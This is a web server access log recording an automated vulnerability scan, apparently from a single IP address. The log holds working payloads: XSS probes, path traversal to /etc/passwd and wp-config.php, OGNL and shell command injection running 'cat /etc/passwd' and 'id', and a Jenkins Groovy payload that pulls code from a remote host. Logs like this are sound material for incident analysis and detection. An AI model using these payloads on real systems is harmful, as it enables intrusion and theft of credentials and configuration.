195.164.49.69 - - [20/Oct/2024:15:06:18 +0000] GET /?rememberme=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-rememberme%27%29%3E&module=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-module%27%29%3E&comment_ID=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-comment_ID%27%29%3E&client_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-client_id%27%29%3E&noheader=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-noheader%27%29%3E&del=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-del%27%29%3E&media=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-media%27%29%3E&user_name=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-user_name%27%29%3E&country=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-country%27%29%3E&phone=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-phone%27%29%3E&sidebar=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-sidebar%27%29%3E&version=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-version%27%29%3E&widget_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-widget_id%27%29%3E&class=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-class%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:15:06:19 +0000] GET /?title=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-title%27%29%3E&view=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-view%27%29%3E&context=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-context%27%29%3E&passwd=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-passwd%27%29%3E&count=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-count%27%29%3E&delete=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-delete%27%29%3E&test=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-test%27%29%3E&hash=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-hash%27%29%3E&csrf_token=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-csrf_token%27%29%3E&o=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-o%27%29%3E&activate=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-activate%27%29%3E&edit=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-edit%27%29%3E&ip=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-ip%27%29%3E&r=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-r%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:15:06:19 +0000] GET /?redirect=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-redirect%27%29%3E&linkcheck=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-linkcheck%27%29%3E&port=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-port%27%29%3E&password=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-password%27%29%3E&target=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-target%27%29%3E&method=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-method%27%29%3E¬e=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-note%27%29%3E&amount=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-amount%27%29%3E&set=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-set%27%29%3E&q=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-q%27%29%3E&select=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-select%27%29%3E&cid=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-cid%27%29%3E&tag=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-tag%27%29%3E&keyword=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-keyword%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:15:06:19 +0000] GET /?edit-menu-item=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-edit-menu-item%27%29%3E&error=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-error%27%29%3E&post_title=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-post_title%27%29%3E&x=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-x%27%29%3E&down=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-down%27%29%3E&state=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-state%27%29%3E&data=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-data%27%29%3E&auth=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-auth%27%29%3E&themes=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-themes%27%29%3E&captcha=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-captcha%27%29%3E&nickname=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-nickname%27%29%3E&allusers=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-allusers%27%29%3E&color=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-color%27%29%3E&path=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-path%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:15:06:19 +0000] GET /?next=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-next%27%29%3E&preview=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-preview%27%29%3E&shortcode=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-shortcode%27%29%3E&features=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-features%27%29%3E&mode=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-mode%27%29%3E&out_trade_no=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-out_trade_no%27%29%3E&category=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-category%27%29%3E&replytocom=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-replytocom%27%29%3E&from=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-from%27%29%3E&start=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-start%27%29%3E&value=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-value%27%29%3E&range=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-range%27%29%3E&table=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-table%27%29%3E&limit=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-limit%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:15:06:19 +0000] GET /?callback=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-callback%27%29%3E&weblog_title=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-weblog_title%27%29%3E&check=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-check%27%29%3E&overwrite=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-overwrite%27%29%3E&prefix=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-prefix%27%29%3E&l=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-l%27%29%3E&token=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-token%27%29%3E&start_date=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-start_date%27%29%3E&direction=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-direction%27%29%3E&ID=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-ID%27%29%3E&pid=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-pid%27%29%3E&to=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-to%27%29%3E&checkemail=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-checkemail%27%29%3E&menu-locations=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-menu-locations%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:15:06:19 +0000] GET /?name=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-name%27%29%3E&json=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-json%27%29%3E&id_base=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-id_base%27%29%3E&where=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-where%27%29%3E&request=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-request%27%29%3E¬es=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-notes%27%29%3E&img=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-img%27%29%3E&a=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-a%27%29%3E&menu-item=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-menu-item%27%29%3E&xml=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-xml%27%29%3E&columns=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-columns%27%29%3E&service=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-service%27%29%3E&site_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-site_id%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:15:06:19 +0000] GET /?tags=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-tags%27%29%3E&e=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-e%27%29%3E&users=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-users%27%29%3E&format=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-format%27%29%3E&dl=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-dl%27%29%3E&position=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-position%27%29%3E&url=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-url%27%29%3E&theme=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-theme%27%29%3E&firstname=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-firstname%27%29%3E&fields=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-fields%27%29%3E&form=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-form%27%29%3E&level=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-level%27%29%3E&month=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-month%27%29%3E&oauth_verifier=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-oauth_verifier%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:15:06:19 +0000] GET /?order_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-order_id%27%29%3E&cookie=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-cookie%27%29%3E&debug=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-debug%27%29%3E&m=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-m%27%29%3E&dir=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-dir%27%29%3E&new_role=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-new_role%27%29%3E&trashed=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-trashed%27%29%3E&log=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-log%27%29%3E&excerpt=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-excerpt%27%29%3E&settings-updated=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-settings-updated%27%29%3E&plugins=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-plugins%27%29%3E&modify=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-modify%27%29%3E&pwd=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-pwd%27%29%3E&file=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-file%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:15:06:28 +0000] GET /?i=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-i%27%29%3E&database=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-database%27%29%3E&tax_input=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-tax_input%27%29%3E&secret=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-secret%27%29%3E&mod=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-mod%27%29%3E&s=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-s%27%29%3E&stage=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-stage%27%29%3E&time=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-time%27%29%3E&new=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-new%27%29%3E&api_key=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-api_key%27%29%3E&invalid=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-invalid%27%29%3E&db=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-db%27%29%3E&upload=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-upload%27%29%3E&tablename=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-tablename%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:15:06:36 +0000] GET /?widget=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-widget%27%29%3E&height=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-height%27%29%3E&screen=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-screen%27%29%3E&pass2=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-pass2%27%29%3E&redirect_to=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-redirect_to%27%29%3E&items=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-items%27%29%3E&string=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-string%27%29%3E&hidden=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-hidden%27%29%3E&f=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-f%27%29%3E&step=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-step%27%29%3E&role=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-role%27%29%3E&preview_nonce=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-preview_nonce%27%29%3E&date=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-date%27%29%3E&event=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-event%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:15:06:36 +0000] GET /?num=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-num%27%29%3E&drop=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-drop%27%29%3E&g-recaptcha-response=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-g-recaptcha-response%27%29%3E&field_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-field_id%27%29%3E&user_email=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-user_email%27%29%3E&alias=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-alias%27%29%3E&ref=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-ref%27%29%3E&save=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-save%27%29%3E&enabled=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-enabled%27%29%3E&year=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-year%27%29%3E&checked=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-checked%27%29%3E&post_ID=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-post_ID%27%29%3E&files=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-files%27%29%3E&text-color=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-text-color%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:15:06:36 +0000] GET /?admin_email=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-admin_email%27%29%3E&code=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-code%27%29%3E&dump=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-dump%27%29%3E&item=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-item%27%29%3E&timezone=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-timezone%27%29%3E&blog_public=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-blog_public%27%29%3E&add=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-add%27%29%3E&enable=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-enable%27%29%3E&customized=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-customized%27%29%3E&admin_password=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-admin_password%27%29%3E&keywords=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-keywords%27%29%3E×tamp=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-timestamp%27%29%3E&label=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-label%27%29%3E&g=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-g%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:15:06:36 +0000] GET /?location=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-location%27%29%3E&link_url=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-link_url%27%29%3E&post_mime_type=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-post_mime_type%27%29%3E&uid=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-uid%27%29%3E&host=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-host%27%29%3E&cmd=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-cmd%27%29%3E&link_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-link_id%27%29%3E&reset=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-reset%27%29%3E&nonce=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-nonce%27%29%3E&username=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-username%27%29%3E&site=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-site%27%29%3E&do=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-do%27%29%3E&email=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-email%27%29%3E HTTP/1.1 200 11204
- - - [20/Oct/2024:15:06:48 +0000] GET null HTTP/1.1 400 2308
195.164.49.69 - - [20/Oct/2024:15:06:49 +0000] GET /login/../../../etc/passwd HTTP/1.1 400 1160
195.164.49.69 - - [20/Oct/2024:15:06:50 +0000] GET /ftpsync.settings HTTP/1.1 404 1090
195.164.49.69 - - [20/Oct/2024:15:06:51 +0000] GET /?pretty HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:15:06:52 +0000] GET /_cat/indices?v HTTP/1.1 404 1090
195.164.49.69 - - [20/Oct/2024:15:06:53 +0000] GET /_all/_search HTTP/1.1 404 1090
195.164.49.69 - - [20/Oct/2024:15:06:54 +0000] GET /_cluster/health?pretty HTTP/1.1 404 1093
195.164.49.69 - - [20/Oct/2024:15:06:55 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:15:06:56 +0000] GET /cgi-bin/status HTTP/1.1 404 1092
195.164.49.69 - - [20/Oct/2024:15:06:57 +0000] GET /cgi-bin/stats HTTP/1.1 404 1091
195.164.49.69 - - [20/Oct/2024:15:06:58 +0000] GET /cgi-bin/test HTTP/1.1 404 1090
195.164.49.69 - - [20/Oct/2024:15:06:59 +0000] GET /cgi-bin/status/status.cgi HTTP/1.1 404 1107
195.164.49.69 - - [20/Oct/2024:15:07:00 +0000] GET /test.cgi HTTP/1.1 404 1082
195.164.49.69 - - [20/Oct/2024:15:07:01 +0000] GET /debug.cgi HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:15:07:02 +0000] GET /cgi-bin/test-cgi HTTP/1.1 404 1094
195.164.49.69 - - [20/Oct/2024:15:07:03 +0000] GET /users/sign_in HTTP/1.1 404 1091
195.164.49.69 - - [20/Oct/2024:15:07:05 +0000] GET /public/error.jsp?errCode=%22%3E%3Cimg%20src=x%20onerror=alert(document.domain)%3E HTTP/1.1 404 1094
195.164.49.69 - - [20/Oct/2024:15:07:06 +0000] GET /threaddump HTTP/1.1 404 1084
195.164.49.69 - - [20/Oct/2024:15:07:07 +0000] GET /actuator/threaddump HTTP/1.1 404 1097
195.164.49.69 - - [20/Oct/2024:15:07:08 +0000] GET /web.config.i18n.ashx?l=nfftl&v=nfftl HTTP/1.1 404 1094
195.164.49.69 - - [20/Oct/2024:15:07:09 +0000] GET /SWNetPerfMon.db.i18n.ashx?l=nfftl&v=nfftl HTTP/1.1 404 1099
195.164.49.69 - - [20/Oct/2024:15:07:10 +0000] GET /openam/oauth2/..;/ccversion/Version HTTP/1.1 404 1125
- - - [20/Oct/2024:15:07:11 +0000] POST null HTTP/1.1 400 2308
195.164.49.69 - - [20/Oct/2024:15:07:13 +0000] GET /.DS_Store HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:15:07:14 +0000] GET /cgi-bin/config.exp HTTP/1.1 404 1096
195.164.49.69 - - [20/Oct/2024:15:07:15 +0000] GET /module/api.php?mobile/webNasIPS HTTP/1.1 404 1092
195.164.49.69 - - [20/Oct/2024:15:07:17 +0000] GET /api/v1/totp/user-backup-code/../../system/system-information HTTP/1.1 404 1162
195.164.49.69 - - [20/Oct/2024:15:07:18 +0000] GET /www/setup.php HTTP/1.1 404 1091
195.164.49.69 - - [20/Oct/2024:15:07:19 +0000] GET /dompdf/dompdf/www/setup.php HTTP/1.1 404 1113
195.164.49.69 - - [20/Oct/2024:15:07:19 +0000] GET /js/dompdf/www/setup.php HTTP/1.1 404 1109
195.164.49.69 - - [20/Oct/2024:15:07:20 +0000] GET /portal/application/libraries/dompdf/www/setup.php HTTP/1.1 404 1143
195.164.49.69 - - [20/Oct/2024:15:07:21 +0000] GET /sites/all/libraries/dompdf/www/setup.php HTTP/1.1 404 1134
195.164.49.69 - - [20/Oct/2024:15:07:22 +0000] GET /vendor/dompdf/dompdf/www/setup.php HTTP/1.1 404 1124
127.0.0.1 - - [20/Oct/2024:15:07:23 +0000] GET /server-status HTTP/1.1 404 1087
195.164.49.69 - - [20/Oct/2024:15:07:24 +0000] GET /.bash_history HTTP/1.1 404 1087
195.164.49.69 - - [20/Oct/2024:15:07:25 +0000] GET /.ksh_history HTTP/1.1 404 1086
195.164.49.69 - - [20/Oct/2024:15:07:26 +0000] GET /.sh_history HTTP/1.1 404 1085
83.212.98.101 - - [20/Oct/2024:15:07:27 +0000] GET /ReplicationManager/ HTTP/1.1 200 2074
195.164.49.69 - - [20/Oct/2024:15:07:27 +0000] GET /.zsh_history HTTP/1.1 404 1086
195.164.49.69 - - [20/Oct/2024:15:07:28 +0000] GET /cgi-bin/login_mgr.cgi?C1=ON&cmd=login&f_type=1&f_username=admin&port=80%7Cpwd%26id&pre_pwd=1&pwd=%20&ssl=1&ssl_port=1&username HTTP/1.1 404 1099
195.164.49.69 - - [20/Oct/2024:15:07:30 +0000] GET /mifs/aad/api/v2/admins/users HTTP/1.1 404 1122
195.164.49.69 - - [20/Oct/2024:15:07:31 +0000] GET /env HTTP/1.1 404 1077
195.164.49.69 - - [20/Oct/2024:15:07:32 +0000] GET /actuator/env HTTP/1.1 404 1090
195.164.49.69 - - [20/Oct/2024:15:07:33 +0000] GET /actuator;/env; HTTP/1.1 404 1092
195.164.49.69 - - [20/Oct/2024:15:07:34 +0000] GET /message-api/actuator/env HTTP/1.1 404 1106
195.164.49.69 - - [20/Oct/2024:15:07:35 +0000] GET /trace HTTP/1.1 404 1079
195.164.49.69 - - [20/Oct/2024:15:07:36 +0000] GET /sslmgr HTTP/1.1 404 1080
195.164.49.69 - - [20/Oct/2024:15:07:37 +0000] GET /?id=%25%7B%28%23instancemanager%3D%23application%5B%22org.apache.tomcat.InstanceManager%22%5D%29.%28%23stack%3D%23attr%5B%22com.opensymphony.xwork2.util.ValueStack.ValueStack%22%5D%29.%28%23bean%3D%23instancemanager.newInstance%28%22org.apache.commons.collections.BeanMap%22%29%29.%28%23bean.setBean%28%23stack%29%29.%28%23context%3D%23bean.get%28%22context%22%29%29.%28%23bean.setBean%28%23context%29%29.%28%23macc%3D%23bean.get%28%22memberAccess%22%29%29.%28%23bean.setBean%28%23macc%29%29.%28%23emptyset%3D%23instancemanager.newInstance%28%22java.util.HashSet%22%29%29.%28%23bean.put%28%22excludedClasses%22%2C%23emptyset%29%29.%28%23bean.put%28%22excludedPackageNames%22%2C%23emptyset%29%29.%28%23arglist%3D%23instancemanager.newInstance%28%22java.util.ArrayList%22%29%29.%28%23arglist.add%28%22cat+%2Fetc%2Fpasswd%22%29%29.%28%23execute%3D%23instancemanager.newInstance%28%22freemarker.template.utility.Execute%22%29%29.%28%23execute.exec%28%23arglist%29%29%7D HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:15:07:38 +0000] GET /RestAPI/ImportTechnicians HTTP/1.1 404 1103
195.164.49.69 - - [20/Oct/2024:15:07:39 +0000] GET /mifs/asfV3/api/v2/admins/users HTTP/1.1 404 1124
195.164.49.69 - - [20/Oct/2024:15:07:40 +0000] GET /cgi-bin/;cat$IFS/etc/passwd HTTP/1.1 404 1113
- - - [20/Oct/2024:15:07:41 +0000] GET null HTTP/1.1 400 2308
195.164.49.69 - - [20/Oct/2024:15:07:42 +0000] GET /xwiki/bin/get/Main/DatabaseSearch?outputSyntax=plain&text=%7D%7D%7D%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7Dprintln%28%22Hello%20from%22%20%2B%20%22%20search%20text%3A%22%20%2B%20%2823%20%2B%2019%29%29%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D%20 HTTP/1.1 404 1123
195.164.49.69 - - [20/Oct/2024:15:07:43 +0000] GET /bin/get/Main/DatabaseSearch?outputSyntax=plain&text=%7D%7D%7D%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7Dprintln%28%22Hello%20from%22%20%2B%20%22%20search%20text%3A%22%20%2B%20%2823%20%2B%2019%29%29%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D%20 HTTP/1.1 404 1113
195.164.49.69 - - [20/Oct/2024:15:07:45 +0000] GET /securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%0a@GrabResolver(name=%27test%27,%20root=%27http://aaa%27)%0a@Grab(group=%27package%27,%20module=%27vulntest%27,%20version=%271%27)%0aimport%20Payload; HTTP/1.1 404 1207
195.164.49.69 - - [20/Oct/2024:15:07:46 +0000] GET /ACSServer/WebServlet?act=getMapImg_acs2&filename=../../../../../../../etc/passwd HTTP/1.1 404 1098
195.164.49.69 - - [20/Oct/2024:15:07:47 +0000] GET /ACSServer/WebServlet?act=getMapImg_acs2&filename=../../../../../../../windows/win.ini HTTP/1.1 404 1098
- - - [20/Oct/2024:15:07:48 +0000] GET null HTTP/1.1 400 2308
195.164.49.69 - - [20/Oct/2024:15:07:49 +0000] GET //CFIDE/wizards/common/utils.cfc?method=wizardHash&inPassword=foo&_cfclient=true&returnFormat=wddx HTTP/1.1 404 1121
195.164.49.69 - - [20/Oct/2024:15:07:50 +0000] GET /core HTTP/1.1 404 1078
195.164.49.69 - - [20/Oct/2024:15:07:50 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:15:07:52 +0000] GET /wp-admin/admin-ajax.php?action=duplicator_download&file=..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1 404 1101
195.164.49.69 - - [20/Oct/2024:15:07:53 +0000] GET /wp-admin/admin-ajax.php?action=duplicator_download&file=%2F..%2Fwp-config.php HTTP/1.1 404 1101
195.164.49.69 - - [20/Oct/2024:15:07:54 +0000] GET /cgi-bin/weblogin.cgi?username=admin';cat+/etc/passwd HTTP/1.1 404 1098
195.164.49.69 - - [20/Oct/2024:15:07:55 +0000] GET /premise/front/getPingData?url=http://0.0.0.0:9600/sm/api/v1/firewall/zone/services?zone=;/usr/bin/id; HTTP/1.1 404 1107
195.164.49.69 - - [20/Oct/2024:15:07:56 +0000] GET /metrics HTTP/1.1 404 1081
195.164.49.69 - - [20/Oct/2024:15:07:57 +0000] GET /api/metrics HTTP/1.1 404 1089
195.164.49.69 - - [20/Oct/2024:15:07:58 +0000] GET /NON_EXISTING_PATH/ HTTP/1.1 404 1096
195.164.49.69 - - [20/Oct/2024:15:07:59 +0000] GET /remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession HTTP/1.1 404 1093
195.164.49.69 - - [20/Oct/2024:15:08:00 +0000] GET /zabbix/index_sso.php HTTP/1.1 404 1098
195.164.49.69 - - [20/Oct/2024:15:08:01 +0000] GET /index_sso.php HTTP/1.1 404 1087
195.164.49.69 - - [20/Oct/2024:15:08:02 +0000] GET /photo/combine.php?type=javascript&g=core-r7rules/../../../hello.php. HTTP/1.1 404 1095
195.164.49.69 - - [20/Oct/2024:15:08:03 +0000] GET /s/2nhrXPZpTLjMqUFXArRYsB8L7zu/_/;/WEB-INF/web.xml HTTP/1.1 404 1143
195.164.49.69 - - [20/Oct/2024:15:08:04 +0000] GET /access/set?param=enableapi&value=1 HTTP/1.1 404 1088
195.164.49.69 - - [20/Oct/2024:15:08:05 +0000] GET /SetupWizard.aspx/roZKiBKjJO HTTP/1.1 404 1105
195.164.49.69 - - [20/Oct/2024:15:08:06 +0000] GET /.mysql_history HTTP/1.1 404 1088
195.164.49.69 - - [20/Oct/2024:15:08:07 +0000] GET /api/experimental/latest_runs HTTP/1.1 404 1110
